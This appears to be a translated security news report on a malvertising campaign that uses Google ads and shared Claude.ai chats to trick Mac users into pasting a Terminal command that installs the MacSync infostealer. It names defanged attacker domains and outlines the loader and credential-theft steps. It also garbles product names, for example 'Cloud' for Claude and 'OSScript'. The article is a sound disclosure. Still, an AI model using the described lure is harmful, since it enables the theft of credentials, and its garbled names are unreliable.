The attackers are currently running a malicious campaign that is used google ads And valid shared chat on cloud.ai To spread macOS Infostealer malware. The campaign was identified by Burke Albayrak, a security engineer at Trendool Group, with BleepingComputer independently confirming a second active version using different infrastructure.
Users are searching “Cloud Mac Download” Sponsored Google search results may see them directing them to Claude.ai, with the URL appearing legitimate. These links lead to publicly shared cloud chats that purportedly appear to be the official “Cloud Code on Mac” installation guide from Apple Support. The chat instructs users to open a terminal and paste a command, which then silently downloads and executes the malware.
At the time of reporting, two different cloud shared chats involved in this attack were publicly accessible, each using different domains and payloads but sharing a similar social engineering approach.
How does the Claude.ai Malvertising attack work?
The command being pasted downloads a shell script that is encoded in Base64 from a domain controlled by the attackers. A version marked by BleepingComputer brings a script called loader.sh from bernasibutuwq2[.]com, while the other, identified by Albayrak, uses customroofing contractors[.]com.
This loader runs entirely in memory, meaning it leaves minimal traces on disk. The server provides a uniquely obfuscated version of the payload for each request, a technique known as polymorphic delivery. This approach makes signature-based identification more difficult.
In one variant, attackers profile the victim before sending the main payload:
- Checks whether the machine has Russian or CIS-region keyboard input sources configured. If so, the script exits and sends a sys_blocked status ping to the attacker’s server.
- It also collects the external IP address, hostname, operating system version, and keyboard locale, which it passes back to the attacker.
- Next, it downloads a second-stage payload that runs via OSScript, macOS’s built-in scripting engine. This allows the attacker to execute remote code without leaving the traditional binary.
The version marked by Albayrak skips the profiling step and proceeds directly to execution. It collects the contents of browser credentials, cookies, and the macOS Keychain, then sends this data to the attacker’s server. Albayrak has identified this variant as part of the MacSync macOS information stealing family.
Why is this Claude.ai malware campaign difficult to detect?
Most malicious campaigns rely on look-alike domains that mimic the actual product’s website. In this case, the campaign uses the legitimate claude.ai domain, as the malicious instructions are hosted within Claude’s own shared chat feature.
There are no spoofed URLs to flag as suspicious, and the destination of the service shown in the Google ad appears to be genuine. A similar campaign exploiting ChatGPT and Grok shared chats was reported in December.
How to Avoid Fake Cloud Installation Malware
Avoid clicking on sponsored search results When searching for software downloads. Instead, go directly to cloud.ai to access the official Cloud app. Be wary of any instructions that ask you to paste Terminal commands, no matter where they appear.
The valid Cloud Code CLI is available through Anthropic’s official documentation and does not require pasting commands from the chat interface.
If a shared chat in the cloud prompts you to run a terminal command attributed to support, consider it malicious.
BleepingComputer contacted Anthropic and Google for comment ahead of publication. At this time neither company has issued any public statements regarding the abuse of shared chats and ad placements.
